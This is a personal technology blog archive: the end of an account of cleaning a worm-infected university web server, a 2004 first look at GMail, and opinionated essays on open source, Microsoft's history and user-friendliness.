The struggle in the server room was in full swing. By the time most of the patches were in place (there was one we missed and would now know until much later) the server must have rebooted a billion times. Finally the virus scan was in place and we realized how lucky we were to have created a clean copy of the site ready for deployment. Norton was deleting all the files that it could not clean, and that included most of the startup pages in the web site, and all of its sections. Letting the scan run completely, and many times we were quite sure that we were clean.

The 10:00 p.m. deadline came and the routers went online. The net-starved IIM Calcutta community immediately came online. To make it easy for the users, and also to provide an alternative till the main web server came up, the Linux box mirrored all the updates, and information about the drill to clean infected computers.

The day crossed over into the next, and at 12:00 a.m. the site zip was in place and file copy was in progress. By around 1:00 a.m. the site tentatively came live, minus the cable connecting it to the network. after browsing a while and making sure that the site was indeed the way it was supposed to be, we went live.

By 2:00 a.m. we were back offline and deleting the admin.dll that had tftp'ed itself into the temp folder. Frantic searching located the missing patch. Patch-rinse-repeat. Now the server did hold but we did not have the energy to keep monitoring it or the guts to keep it online without supervision. So the server went back offline and we went to bed.

The next morning arrived without me in the server room. I was back with Megadeth at full blast trying to complete my Project in time that suddenly had 40 fewer hours to the deadline. But the news was that the freshly patched server was holding up and doing well. Of course a number of client machines are still infected and need to be cleaned. But so far we have not had a single report of late or cross infection.

(We got a 12 hour extension on the project submission and mine did go well in time. Thanks for asking anyway)

Related links

Symantec
Mcafee
Trend Micro Update
F-Secure virus definitions
Symantec Removal Tool
CERT Advisorywith a number of other links too.
Another Fight The TechRepublic battles

Document Changes
November 22, 2004: Essential rewrite of article stressing the central idea and new links too.
April 02, 2009: Updates and corrections.

May 27, 2004

First Look at GMail

A Preview into the next Block-Buster from Google

I logged into Blogger on the morning of 7th May, to discover a link that proclaimed that I was an 'active' user and invited me to signup for a preview of Google's much awaited block-buster - GMail. Considering this is what I had been waiting for, ever since I heard the first whispers about GMail, I was more than happy to oblige.

The signup process was quick and painless. The GMail signup wizard picked up my name and email from Blogger, and brought me to a page that asked me to simply choose a account name. The text box that asked me to choose an account name, had a helpful little button right underneath that said "Check Availability", to check if the particular account name was valid and available. Just the signup process showed how professional Google was going to be about GMail.

First Looks: The Simplicity

Soon, I was done with the registration and was dropped into my new GMail interface. The first thing that struck one, was the simplicity and cleanliness of the interface. A big friendly GMail logo and the omnipresent Search bar on the top. There was no toolbar cluttered with options, just a drop-down and a single button. The left hand side had just 7 links. The actual section where the mails are listed had just four columns without any headings. The entire interface was designed to be clean and simple, to the point of being austere.

The single biggest difference between GMail and other email interfaces is simply this - GMail does not deal with emails. Instead it deals with conversations. A conversation for GMail is the entire set of related emails, including RE:'s and FW:'s. Any display of emails, displays not the actual emails, but entire conversations. The number of emails in a particular conversation is displayed in a bracket. Further, the conversations are ordered by the time of the latest mail in that particular conversation.

Classification, Storing & Displaying Conversations

For GMail, there is one means for classification - labels. Labels are defined by the user and each conversation can be 'applied' any number of labels. These labels can then be used to filter any display showing just that mails that you need to see. There are no folders, where mails can get lost, only filters that can be removed and reapplied with a single click. So much so, even the search is just another filter on the entire listing of conversations.

The only 'folder' that is hard coded is the "Archive" option, which effectively removes the mail from the inbox view. Another filtering/flagging option available is the "Starred" option, which visually distinguishes the various conversations. Starred option however extends to individual mails as well, meaning that individual mails in a conversation can also be starred.

The actual interface showing the mails in a conversation is unfamiliar but once you get used to it, is very powerful. Each mail in the conversation is shown in a separate 'pane'. These panes are ordered linearly by time. Luckily GMail has refused to show the conversation in either a threaded or nested format, which increases simplicity and correspondingly accuracy.

The difference between the 'pane' and a mail is that a pane automagically removes all the quoted part of a mail. That means, in a conversation, the 10th mail usually contains the quoted text from the 9 previous mails. The pane however hides this to show only the content from the 10th mail. Of course, it is possible to show the quoted content too if desired. Drop into a relatively heavy conversation and you will see all the panes tightly stacked together. One click and this opens up into a looser stack, showing just the sender and the time for each pane. Each item can then be clicked to open, read and clicked again to send back into the stack.

Contacting your Contacts and Composing your Mails

Every person you mail to, or get a mail from is automatically in your contact list. How absolutely brilliantly simple and obvious. Why ever were we required to use divining capabilities to predict which of the contacts we are dealing with would be needed by us in the future? Of course, with 1 GB of space, you can afford this extravagance. Right now, though, the only contact information you can include is the Name, email and some Notes. I am not sure if I will not miss having fields for at least phone numbers. Another thing, as the owner you are automatically given a nickname 'me'.

Click on compose and you will be taken to a page with three text boxes and three buttons. Again, GMail's fanatic focus on simplicity shows. But true brilliance hits you when you start typing addresses in the "To" box. GMail's auto complete feature gets typing addresses back in fashion. If you were not impressed enough, hit the 'undock' icon on the right top corner of the compose screen and the entire compose screen pops right off the browser into a new window. Remember all of you who like to compose in a new window, while browsing messages in another? Well, GMail knows exactly what you are talking about.

The spell checking is another beautiful feature. GMail does a damn quick job of marking out all your mistakes in red, allowing you to interactively edit them. However, testing it with an excessive amount of text did produce some unexpected errors.

Keyboard Ahoy! and other UI features

Google extended its "keyboard shortcuts" beta feature to the GMail UI. This means that you can use a number of features without having to reach out for the mouse. This combined with the auto complete feature for filling in addresses is a hark back to the age of the *NIX interfaces, where the keyboard ruled. For those of you who believe in doing things fast, time spent in picking up at least a few of these shortcuts will prove to be a very valuable investment indeed. Those of you who don't give a damn about speed, please please please, just try out the feature once. The sheer genius of the implementation is bound to floor you completely.

GMail uses a variety of on-screen prompts to tell you what it is doing. Pages load blazingly fast, and if any one of them takes longer than a second to load, a brief floating message flashes on the top of the page to tell you that the page is "Loading...". While browsing a conversation, a similar floating message flashes on the bottom of the message, telling you whose message is expected next.

Another simple yet highly effective trick GMail uses to make life simple for us is to mark out those conversations that are addressed specifically to you, versus those that are part of a mailing list. They call this the "Personal level indicators". Again, an idea that is so dumb, that you wonder why no one else had thought of it before.

Other Issues

For most of us, having our email with our_stingy_free_service_provider.com the single biggest reason to defect to GMail would be the 1 GB of email space it offers. For most of us, this would be a life-time supply of email space. This however has not been one of the biggest reasons GMail has been in the news recently. The big controversy surrounds GMails proposal to parse through user email and display relevant ads alongside the message.

Compared with yahoo's practice of appending monstrous, irrelevant ads to every email this is hardly an issue. Further, with Google's repeated clarifications that no human would ever access any email information, while only machines would, leaves little reason to be unhappy about. Machines keep reading our mails all the time. Spam filtering software do that. Web based email services do that while displaying messages. List servers (a la yahoogroups) do that when they are munging email headers. Google does not even change the message content, when it parses the mails, but only displays relevant ads alongside the email. Considering Google's stubborn insistence at being honest and open about all it does, I don't see the reason for any controversy.

The ads themselves are unobtrusive and plain text ads. And they are placed discreetly to the right, just like in Google searches. If you have searched on Google, and have not been bothered by the sponsored ads, there is no reason for you to even give a second thought to the ads in the google inbox. In fact, considering that for once a company is taking my privacy seriously, and the ads themselves are so cutely non-intrusive, I might be tempted to check a few of them out, just for the heck of it.

Final Words of the First Look

GMail is an application that has been engineered in the REAL sense of the word. In a world where applications are a lump of collected functionality, GMail outshines almost every application known, let alone email clients. Conversations to store emails, labels instead of folders to classify conversations, keyboard shortcuts, auto complete feature for the addresses are so mind-numbingly essential, that I will start missing them from this second on in my email client. This combined with 1 gig storage, automatically stored contacts and the simple elegance of the UI builds GMail into a formidable package.

Those of you who did not get to see it yet - Tough Luck People!

Document Changes
May, 07, 2004: First published version.

February 27, 2004

The Business of Open Source Software

An Introduction to Open Source Software

Even a casual follower of technical news would have noticed a recent strengthening trend in mainstream press. There is an ever-increasing mention of terms like Open Source, Free Software, and Linux. Further investigation would reveal that, for some reason, this issue seems to divide the world into two camps: those that feel very strongly about it and those that don’t.

That part of humanity, which feels strongly about Open Source Software (OSS) and Free Software (FS), wouldn’t have much use for this article. However, for those of you who are in the other camp and possess a mild curiosity about this phenomenon, this article attempts to unravel a few terms and provide a few perspectives.


What exactly is this beast?

This section is best started with a clarification. There is not one beast here but several and vastly different beasts. However, for the purpose of simplicity, we will not allude further to this difference. Instead we will try to gain an overview of the philosophy of Free/Open Source software. Further information is, however, easily available. [1][2]

In the 1970s, the world was still young. At least the world of computers was. The computer then was the Digital PDP-10 and software was something you wrote to get work done. The source code of software was freely available to see, modify, reuse, or improve. The 1980s, however, saw the breakdown of this culture, and the rise of proprietary software.

Proprietary software is different from free software. Usage of proprietary is typically limited to usage of the executable only, without access to its source code. The rights of the users to attempt to modify the executable are severely curtailed. Further, compensation is required to be paid to the ‘owner’ of the proprietary software to gain limited rights to use the software. The rights of the customer to reuse or share the software are also curtailed according to the agreement signed for the purchase of the software. On the contrary, free software does not place such restrictions on reuse or sharing of software. Here, free does not mean without compensation, but rather means the freedom to choose to use software without restrictions. Further, the OSS software also distributes the source code of the software along with the executable, so that the user can read and modify it as he sees fit.

Returning to the story at hand, this change from the 70s to the 80s was not acceptable to a number of people. One such person was Richard Stallman. He was so irked by the closing up of the software community that he decided to do something about it. To ensure that the freedom to use software remains, he set up the GNU Foundation. The goal of the GNU foundation was to build and distribute components for a complete operating system according to the philosophy of having freedom to use software as seen fit.

In 1984, the GNU was set up. In 1985, its first product – the GNU Emacs was built and released to the world. In tune with the philosophy, the GNU baulked at the proposition of “copyrighting” their work. Instead they “copylefted” their software under what came to be known as the GNU Public License (GPL) [3]. Copyleft uses the copyright law, but flips it over to serve the opposite of its usual purpose: instead of a means of privatizing software, it becomes a means of keeping software free.

By the 1990s, work was going on in full steam and a number of components of the UNIX system were being rewritten from scratch and released under the GPL. However, for a complete system, there is one crucial component required to tie all of it together – the kernel. The GNU was working on a kernel called the Hurd, but the project was not delivering. And there could not be a complete ‘free’ system without a kernel.

In 1991, Linus Torvalds, a 21-year-old computer science student at the University of Helsinki, decided that his personal operating system, Minix, a Unix-look-alike operating system was not good enough. [4] He was pretty sure he could write something better. So in a very brave and foolish attempt he started to write his own. But in doing this he made an important decision, to involve other people. He took the help of a number of the news groups at that time, to ask for ideas and guidance. And from this sprang the kernel, which we now know as Linux. GNU/Linux became the complete “free” operating system that Richard Stallman and a number of others had been dreaming of.


So what does this mean to me?

No talk about OSS/FS is complete without talking about the other extreme, or at least the perceived extreme – Microsoft. Somewhere along the way, not without reason though, the fight for the freedom to use software has been morphed into the fight between Linus Torvalds and Microsoft (Bill Gates). To the media, of course, this is selling stuff, and it has done little to allay this misconception. However, the first step to understanding, using, and benefiting from OSS/FS starts at breaking the media stereotype of David vs. Goliath.

Free software is not about cost. Free software is about freedom, freedom to use, freedom to reuse, freedom to distribute, and freedom to change. If this results in a perceived low initial investment, then it has more to do with the economics of it, rather than it being the USP of free software.

Software is like other economic goods and is unlike other economic goods. It is like other economic goods because it needs effort and expertise to produce and serves an economic interest. It is unlike other economic goods as the marginal cost to produce additional copies is negligible. The returns on investment are much, much higher than other economic goods and reusability is much higher than any other investment. This leaves us with a peculiar scenario – an extremely useful economic good and very easy to reuse.

This gives rise to problems similar to the ones faced by the music and motion picture industry. But software is not art, and it can deliver monetary benefits. To protect such a ‘property’ the copyright law has been typically employed. Using the principles of IP to protect software like music, has led to a monopoly like situation. Accepting a proprietary software solution for a business process makes the business process monopolistically dependent on the software.

And monopoly increases prices, and that too significantly.

After the bubble burst on the great IT dream, the software industry is facing a significant over supply of resources, leading to low productivity. And this low productivity is being maintained by the monopolistic premium charged by software vendors. To state it differently – current software development, selling, deploying and administering process is grossly inefficient. This inefficiency is being fuelled by the proprietary nature of software. The bottom line is that the IT department budgets are taking the blame.

This is where OSS/FS plays a crucial role. By driving down prices of software, OSS/FS drives true productivity in the entire process of making and selling software. This productivity is what reflects as low prices for OSS/FS and is not an endemic nature of the software.


What can I do?

Understand the philosophy of OSS/FS. It is crucial to understand what freedom means because it will help you appreciate the true nature of software in general and free software in particular. Further it will help you no matter where you are to form realistic expectations of what to expect from OSS/FS.

If you run the IT department for a business, there is a tremendous cost savings for you. Free software is easier to maintain and gives a lower TCO. Free software contributors are a great source to snag amazing programmers from. Finally free software gives you a flexibility of choice, which is never possible on a proprietary platform.

If you are a programmer or a software maintainer, there is tremendous learning for you. You have knowledge beyond your wildest dreams in OSS/FS forums. OSS is a great way to read, obtain and reuse code snippets. FS gives to access to technologies never possible on the proprietary platform.

If you are an end user, OSS/FS is your source of productivity and flexibility. Recognize that OSS/FS is not about Windows versus Linux, but is about choice. When you make that investment into hardware or software, recognize that it is your right to demand more. And recognize that your hardware is capable of more, software is capable of more, and proprietary solutions are neither the highest nor the best benchmarks.


The road ahead

It is easy to talk about the great dream of free software ruling the earth. However, free software has its own, very obvious flaws. OSS/FS cannot be everywhere. OSS/FS cannot scale to build every need. But is a great way to recognize that software is not just another economic good. You can demand and get more out of your IT buck. And that freedom is your birthright.

[1] http://www.gnu.org/philosophy/philosophy.html
[2] http://www.gnu.org/gnu/thegnuproject.html
[3] http://www.gnu.org/copyleft/gpl.html
[4] http://www.geocities.com/n_ravikiran/write003.htm

Document Changes
February, 27, 2004: First published version. This essay was written as a writing sample for an "Effective Business Writing" Course.

February 26, 2004

Why Microsoft has no other alternative

A history of Microsoft, and why they are the way they are.

A few days back I had this discussion with a friend of mine. It centered around one of my favorite topics - Linux and Microsoft. The discussion was essentially about the ideas of monopoly. My friend's view was that being a monopoly, Microsoft was justified in behaving the way it is. My counter-point however was that, this monopoly itself was ill-earned. Which naturally needed a lot more clarification. Hence this article.

The History

Microsoft was formed by Bill Gates and Paul Allen, and began by writing software for the IBM's home PC - Altair, around 1975. It struggled the first few years of its existence, looking for its niche in the market. In 1980, IBM was waking up and was like the proverbial cat on the tin roof. IBM wanted to get a machine on the market as soon as possible. And instead of going ahead with another version of their 8-bit machine, they chose to go with the 16-bit Intel, 8086 chip. This meant IBM needed a new OS, and fast.

A number of things hap penned in a very short time. Microsoft bought an existing PC Operating System. IBM chose not to wait for the CP/M to be written for its new processor. Microsoft offered to bundle its OS with the IBM PC (for peanuts), and also work with IBM to develop it. MS-DOS was released in 1981. (A brief history DOS here and here.)

MS DOS was itself not an original product of Microsoft. Instead, it was the creation of a company called Seattle Computer Company, and Tim Paterson (who later joined Microsoft). It was known as QDOS 0.10 (Quick and Dirty Operating System), before Microsoft bought all rights of the OS from Seattle Computer and changed the name to MS-DOS 1.0.

IBM never intended that MS DOS (or PC-DOS) be the Operating System for the IBM-PC. They were in fact waiting for the CP/M to come out with its 8086 version. What happened was something quite different. Squabbles between Digital Research (the vendor for CP/M) and IBM delayed the CP/M-86. With Microsoft being the sole interested party in providing an operating system, IBM found itself with a nothing other than QDOS 0.10, under the name of MS-DOS 1.0, for shipping with the IBM PC in October 1981. The quality of this product was so bad that the initial IBM PC shipped without an operating system. Later, IBM itself undertook a rigorous rewrite of the MS DOS, to get it partially ready for bundling with its PC. (The PC-DOS is hence copyrighted by both IBM and Microsoft). In spite of this, Digital Research's CP/M-86 would still have been the operating system for the PC but for two things - Digital Research wanted $495 for CP/M-86 and many software developers found it easier to port existing CP/M software to DOS rather than the new CP/M-86 operating system. Priced at $39.95 DOS became the automatic choice for the users of the new range of IBM PCs. Thus Microsoft's (poor) clone of CP/M managed to become the de-facto Operating system for the IBM PCs, not by any technical superiority, or even a marketing blitz (which Microsoft was quite incapable of undertaking) but by sheer timing.

What hap penned to the IBM PC is, as they say, history. Riding on the success of the IBM PC, MS DOS became the default Operating System in the PC world. Despite its success, the MS DOS, was never a technically superior product than any of its contemporaries. MS DOS 1.0 was nothings by QDOS 0.1. It added support for storage disks, and went through versions 2.0 in '83 and 3.0 in 84. Network support did not come until as late as version 3.1 in 1984. While the rest of the world (read Unix) boasted of incredibly powerful and versatile OSes running a variety of hardware platforms, MS DOS was still going with some extremely buggy versions of its operating system, into version 4.0 in 1988. Most of the basic utilities and tools that normally should for part of any operating system were included in versions as late as 5.0 and 6.0 in '91 and '93 respectively. Version 6.22 was released in 1994, which was the last official 'DOS version' of MS-DOS, while 7.0 and 7.1 were released for almost exclusive use as a basis for Windows 95.

MS DOS, was never a technical marvel. It's success had more to do with some decisions and some people and the explosion called the IBM PC. But today's Microsoft is not about DOS. It it about quite another thing called Windows. But lets begin at the beginning.

The concept of using a graphical visual interface originated in the mid 1970s at the Xerox Palo Alto Research Center (PARC) where a graphical interface was developed for the Xerox Star computer system introduced in April 1981. PARC had earlier also developed a success story with the Alto computer, which in mid 75 were so successful technologically that they quickly became the benchmarks for all graphical interfaces that came later. The Xerox Star did not experience any commercial success, but its ideas were copied by Apple Computer, first in the innovative Lisa in 1983 and then in the Apple Macintosh introduced in January 1984. With these machines, Apple provided WIMP (Windows, Icons, Mice, Pointers) and features like folders, long names etc which, in the PC world, were not fully implemented till Windows 95.

To put it simply, when Windows 95 was released, the reaction of Apple users was "But we had all that 10 years ago". So why did the world wait for Windows 95? The Alto machines were more of a technological demonstration than a commercial venture. They were the path breakers that defined the future on computing, but were unfortunately not commercial successes. Apple suffered from different problems. Apple was a vertically integrated computer company. This meant that Apple made its own architecture, built its own computers, developed its own OS and wrote its own applications. Also, Apple did not operate with any other system. In an industry that was rapidly moving towards commoditization, Apple was a very costly lock-in. Commercial interests took a back-seat at Apple, while it chose to be the cult, the renegade and paid its price. Apple never could pose a challenge to Microsoft, because they never met on the same playground. Apple played on its own hardware, in its own niche, while the huge IBM playground, was left to Microsoft alone.

These were, however, not the only products that could have challenged Windows. Quite a few other products provided graphical operating systems, or graphical shells on top of DOS to run multitasked DOS applications which the native OS had failed to provide. VisiOn from VisiCorp, which came on the heels of VisiCalc - the ground breaking DOS spread sheet program, failed because it was way too early. The hardware was just not ready for it. Digital Research's GEM (Graphical Environment Manager) could not run DOS applications. Quarterdeck Office Systems' DESQview, succeeded for a limited time, till Windows 3.0 became the standard.

It was not just technology and timing that bogged down Microsoft's competition. IBM suffered from short sight. It felt that the GUI was just a passing phase. Top View from IBM was introduced in 85 and discontinued in 87. Windows 1.0, when it was released 1985, was so similar to Apple Macintosh, that the latter threatened to sue Microsoft. In an ingenious move, Microsoft signed a licensing agreement with Apple that stated Microsoft would not employ Apple technology in Windows 1.0, but made no such agreement for further versions of Windows. However, Windows 1.0's dismal failure at the market made it ridiculous for Apple to follow up with litigation.

Windows failure however did not hurt Microsoft as it would have hurt other companies. Because, Microsoft had DOS - its revenue source to fund more and more development on the Windows platform, something that no other company could frankly afford. Version after version, Microsoft bunged Windows, but MS DOS gave them enough revenue to keep at it. By the time Windows became as good as most of the products mentioned here, competition was dead. Curiously, by the time Windows was finally ready, so were the application developers and so was Intel's hardware. When Windows for WorkGroups (Windows 3.1) was released, it was singularly user friendly, had a large set of third party applications to choose from, and had hardware to keep up with demands of a graphical interface. For the first time PCs with Windows were outselling the Mac and Apple could do nothing about it. Impelled by the popularity of its own Word and Excel, Windows rode the craze for the GUI driven PC, guided by the able hands of the future of Microsoft - the incredible marketing machine.

Unlike the old world monopolies of the likes of AT&T, technical superiority was never a hallmark of Microsoft's success. And therein lies the reason for Microsoft being the way it is.

So what does this mean?

Monopolies are always a bad idea. They exist by making the cost of entry into a business very high. Microsoft is a monopoly in the PC OS and Office applications segment. Like other monopolies, like say the AT&T, Microsoft tends to spend time defending its position rather than innovating. A monopoly works to raise, the rather high barrier to entry, even higher. As a result innovation suffers. And when innovation suffers at a company like Microsoft, which is producing Operating Systems, everyone suffers.

The first alarming effect of Microsoft as a monopoly is due the fact that it writes Operating Systems. Writing an Operating System is a thankless job. An Operating System, is the base that runs user application programs. Since it is just above the hardware, there is only so much the OS can do. And consequently there is very little innovation that you can do with an Operating System. Writing an Operating System, making it proprietary, and making people pay for it, is therefore an unsustainable business proposition. Hence Microsoft does what it is doing - bundle in software and gain unfair advantages in application space. Bundle in Internet Explorer, Outlook Express, Windows Media Player. Tweak Windows to run Office components better than competitor products. Not disclose all Windows API information to third party software developers. All these practices are not only anti-competitive, but directly effect the end users in a number of ways.

The second reason why Microsoft's position is a dangerous one is the fact that Windows has been developed rather than designed. Microsoft has put backward-compatibility ahead of other technical considerations. While this might be a good thing in the short run lets understand why this is deadly in the long run.

Writing an Operating System is based on certain standards. Unix-like OSes are built standards like the POSIX. These standards define the basis for building an OS. So POSIX based Operating Systems have a designed strength and capacity for security, performance and architecture. Windows on the other hand developed. Windows from 1 through 98 ran as a shell on top of DOS. In effect, it extended capabilities provided by DOS. Hence the security model, and file system etc offered by Windows were limited by the underlying DOS. Windows recognized this early, and started another thread of development called the NT (New Technology). The Windows NT 4.0 was a major commercial success. After Windows 98, both development trees were merged into the first venerable Windows 2000. Windows XP followed shortly after. You will notice that all through, there was no significant break with the past. Never was there a chance for Microsoft to correct the errors of the early QDOS and start afresh. Never could Microsoft, address issues that were inherent to its offering. In effect, its mantra of backward-compatibility became its own choke-hold.

Windows and Microsoft has preempted any questioning by its customers by doling out goodies. Extreme simplification, integration and ease of use. This is a third reason to be really scared. Technologies like OLE and ActiveX have been polished and pushed repeatedly. Drag & drop have been used to woo customers. Windows Sharing has replaced the FTP. Windows has challenged, without reason, the traditional knowledge that Operating Systems have to be different from Applications by creating a huge monolithic OS/App. While this has brought computing to the masses, this has also created a technological Chernobyl waiting to happen.

In 1983, Fred Cohen, working for his PhD, the in University of Southern California, created the concept of a "self-replicating" program. By 1987, a virus was a known term. 1988, changed all that with the Jerusalem virus, which started making serious trouble. And the trouble did not stop. Leheigh, Tequila, the Dark Avenger Mutation Engine, the Virus Creation Laboratory, Word Concept, Chernobyl, Melissa, ILoveYou, Nimda, Sircam, CodeRed, Klez, BugBear, Slammer and Mydoom represent the woes of the PC world. Symantec became a household name. An email attachment became a bad-word. Simplification, tight integration, backward compatibility and Windows success have created this extremely intolerant monoculture.

There is more. Windows owes its success to the fact that it embraced an open hardware platform (Intel) unlike Apple that bet itself on proprietary hardware. Now it is doing the same thing with Applications and Operating Systems. It is creating customers by locking them into its Operating System and refusing to inter-operate with other OSes. What Apple did with hardware, Microsoft is doing with its OS. This lack of interoperability today could well be its Achilles heel tomorrow.

One other effect of this lock in, is raising costs for the users. It is no longer possible to get Windows without paying for IE and WMP. This is not only reducing options, but also making the OS an expensive proposition. And when Windows comes with all its bells and whistles, hardware costs are correspondingly rising to provide the horse power, which the user never needs. A home user, using the computer for email only, cannot upgrade from Windows 98 to 2000, without paying for a doubly costly hardware upgrade. In short, end-user costs are rising.

It is not as if Microsoft is unaware of this. It is, and its actions are directed by this awareness. Microsoft wants to move away from the OS market into anything else - Xbox, handhelds, Application Software and what not. And each foray of Microsoft is ruthless bordering on the illegal. The browser wars were the beginning. The war against Java was yet another. The war of Windows Media Player with the likes of Real is just heating up, and will not be the last. With Microsoft's cash pile, funding these wars, and given its strangle hold on the computer world, these wars are almost a no-contest for Microsoft. But for the fact that many of the tactics used by Microsoft seriously challenge the antitrust regulators. If Microsoft escaped the US regulators, the EU regulators might yet prove to be a different breed.

Microsoft is not on the leading edge of technology. It however is an awesome marketing team. And right now, it seems invincible. And Microsoft depends on this idea of invincibility for its survival. Its stock price depends on this aura. Microsoft's high valuations are due to the very high valuations of its shares. And this stock price can be held only if Microsoft can prove year after year, that it is growing at a breakneck speed. Does not matter what technology it develops or what markets it enters - its growth is the biggest asset it has as of today. The moment, its investors realize that Microsoft cannot grow the way it has been growing, all hell will break loose. The stock price will drop, initiating a spiral downwards.

Microsoft must not seem vincible.

The Microsoft Philosophy

Almost anything that Microsoft thinks is with regard to the upkeep of this image of invincibility. This is in short the philosophy of Microsoft.

This philosophy is brought forward in some measure of sickening clarity in what are known as the Halloween documents. The body of the Halloween Document is an internal strategy memorandum on Microsoft's possible responses to the Linux/Open Source phenomenon. This was meant to be an internal study, but was leaked out at the time of Halloween 1998. The document itself is a fascinating read. Two comments made in the copy of the document over at the opensource.org are very revealing. I will represent the same here, without reference to the context here. The reader need not accept the same at face value but may want to check out the actual context in the document and see the validity of the statements for himself.

The first talks about the perception focus of Microsoft the 'technology company'.

"

Note the clever distinction here (which Eric missed in his analysis). "customer's eyes" (in Microsoft's own words) rather than any real code quality. In other words, to Microsoft and the software market in general, a software product has "commercial quality" if it has the "look and feel" of commercial software products. A product has commercial quality code if and only if there is a public perception that it is made with commercial quality code. This means that MS will take seriously any product that has an appealing, commercial-looking appearance because MS assumes -- rightly so -- that this is what the typical, uninformed consumer uses as the judgment benchmark for what is "good code".

"

The second is even more damning. Commenting on the Halloween documents' perceived strengths of the Open Source movement

"

The difference here is, in every release cycle Microsoft always listens to its most ignorant customers. This is the key to dumbing down each release cycle of software for further assaulting the non-PC population. Linux and OS/2 developers, OTOH, tend to listen to their smartest customers. This necessarily limits the initial appeal of the operating system, while enhancing its long-term benefits. Perhaps only a monopolist like Microsoft could get away with selling worse products each generation -- products focused so narrowly on the least-technical member of the consumer base that they necessarily sacrifice technical excellence. Linux and OS/2 tend to appeal to the customer who knows greatness when he or she sees it.The good that Microsoft does in bringing computers to the non-users is outdone by the curse they bring upon the experienced users, because their monopoly position tends to force everyone toward the lowest-common-denominator, not just the new users.

Note: This means that Microsoft does the ``heavy lifting'' of expanding the overall PC marketplace. The great fear at Microsoft is that somebody will come behind them and make products that not only are more reliable, faster, and more secure, but are also easy to use, fun, and make people more productive. That would mean that Microsoft had merely served as a pioneer and taken all the arrows in the back, while we who have better products become a second wave to homestead on Microsoft's tamed territory. Well, sounds like a good idea to me.

"

The effect of the Microsoft monopoly and a glimpse into its philosophy are well brought out in the two quote above.

Conclusions

This is by no means a comprehensive outburst on Microsoft. However a number of idea picked up over a period of time have found their way into this article. Many thanks to all those hordes out there, who helped me give shape to and drape in logic the vague ideas that I felt from time to time.

We have a lot to thank Microsoft for. Though it might not be for bringing computing to the masses, but it was for a simplification and a dumbing down of technology that was long overdue. But the large scale dumbing down itself has become the curse that we have to deal with today. Microsoft is a giant and at the same time a kid. It is a giant with its market control, its product usage but it is a kid with its tantrums and its desperate philosophy. It is like a kid with a gun, and I don't trust them one bit.

Related links

A brief history of DOS here and here
Some history of Windows here and here
Webmasterbase on some GUI history
The Halloween Documents

Document Changes
February 26, 2004: Essential rewrite of article stressing the central idea and new links too.
April 01, 2009: Updates and corrections.

September 11, 2001

User Friendly?

An essay on the concept of User Friendliness

The growth in the use of the Personal Computer has brought into prominence a very important concept of user-friendliness, a concept that was not very used in the eras preceding this period. In the succeeding period there has not been a term that has been more used and abused for various means and ends. Here we shall try to get a perspective of user-friendliness and ask some strange questions.

Also note that a major focus of this paper is the application of this term to the environments of Linux and Windows.

The early beginnings of the term user-friendly are shrouded in mystery. But what is known is that this word alone forms one of the biggest and the most successful mantra for the some of the biggest software companies around. So what is user-friendliness.

There's a lot of talk about making software more user friendly. Some pieces of software is user friendly, while others are not, right? Well, that seems to be the opinion that most people have. A common view seems to be that a program is user friendly if it has a graphical user interface, otherwise it is not. But this is a very simplistic and short sighted way of defining user-friendliness. All that graphical systems allows is friendliness and not user-friendliness.

What is the difference? The term "user-friendliness" also contains the word user that explicitly binds any definition of the term to another variable - the user. It means something friendly to the intended audience, and that is where the buck stops. User-friendly software is that software which does not get into the way of a user, not one that can be used without reading a single line from the manual. All user-friendliness requires is a fitness for purpose in the most unobtrusive manner possible.

It is not incumbent upon user friendly software to do the user's work for him. It is also not incumbent to provide animated paper clips that tear across your screen. User friendliness does not mean blandness of design, or lack of options.

One more additional point is to be taken care of before we accept this definition. That is the type of the audience. It is obvious that any user of the software is not one that comes into this world with all this information about that software built into him. He has a learning curve, for every piece of software he uses, just like any other thing he learned about. User friendliness of a software can be therefore further split into friendliness towards the newbie user and the seasoned user. We shall therefore define the user-friendliness aspect of the software with respect to the audience state as being "newbie friendly" "seasoned friendly".

We have in place a set of rules and guidelines, and of course a formal definition of the term user-friendliness. We shall use these tools to examine and understand some of the present concepts of user-friendliness that are prevalent in the community. We shall then proceed from that analysis to examine more important questions.

A few examples before we go on. Emacs is just another text editor. For a newbie. But any user of Emacs who has learnt the keystrokes will swear by Emacs till death. Therefore Emacs is user-friendly as it does indeed makes itself fit for the purpose and does it well, it also is more seasoned friendly. Take the MS-Paint program as another example. Almost every user has used it when he was taking his first faltering moves with the mouse. This program is very simple and intuitive to use. A simple straight forward application for a simple straight forward use. We may argue about the purpose of the program for which it is claiming fitness to, but the point is that this program is classic newbie friendly. I am aware of the bias in choosing examples but this was only for the purpose of illustration, and so no inferences are to be drawn right now.


The present concept of user-friendliness

There are a number of misconceptions about user-friendliness. I shall look at a few of the present attributes of software that are due to misapplication and ms-interpretation of the concept of user-friendliness.

User friendliness has come to denote the GUI, especially when it comes to comparisons between Windows and Linux. "Linux is less user-friendly" because it does not have a GUI like Windows. While the "fact" itself is arguable, that is not the intent here. The fact of the matter is that Linux, like its predecessors in Unix, has a rich set of small and powerful tools, that achieve a particular objective and do so the best way that they can. This tends to be a lot newbie unfriendly, because of the large number of tools available, and the variety of options that they provide. But again most of the tools that are needed to run on the commanline are those that actually do benefit from using the command line. Also these are tools that are not really meant to be used by a newbie, unless he is probably interested in the tool itself. Finally most of these tools do come in with a standard help on the commandline itself. Going by our earlier strict definition of fitness for purpose for the intended audience, all the commanline tools do indeed pass this criterion. They can be safely concluded to be user-friendly. If you find the use of some of these tools difficult or otherwise difficult, think a second they may not probably be for you. You might, have another option of doing the same thing that might be more friendly towards you.

Another common view of user-friendliness of user-friendliness has been "uniformity". Similarity of interface, and similar looking names so that users don't take time to adapt to the software. Although this concept is admirable per se, but an application of our rules makes us thing otherwise. A program is required to be fit for a particular purpose. Which means, so should the user interface. Any good interface should be intuitive for the purpose for which it has been built. And once this is done I see no reason for "uniform interfaces" and "ease of getting used to new interfaces". If you cannot make a spread sheet look like a word processor, the concept of uniformity does not exist and had not existed. In fact I will go so far as to say that all talk of uniformity of interfaces has never existed, was a product of the PR team rather than the developers, and was in fact a limitation of the GUI to be unable to provide ease of creation of new interfaces to the developers.

An aside here. The concept of similar interfaces has been abandoned by all the major software developers. The present term is "intuitive" interfaces. The reason is obvious. When a firm spend a lot of money actually developing software, it would like to make it distinctive and have top of the mind recall for its customers. The interface is the only way of doing it. Given the limitations of adhering to the user-friendliness, the companies obviously have opted out. So not only is the concept idiotic, it does not even exist, except in the PR department briefs.

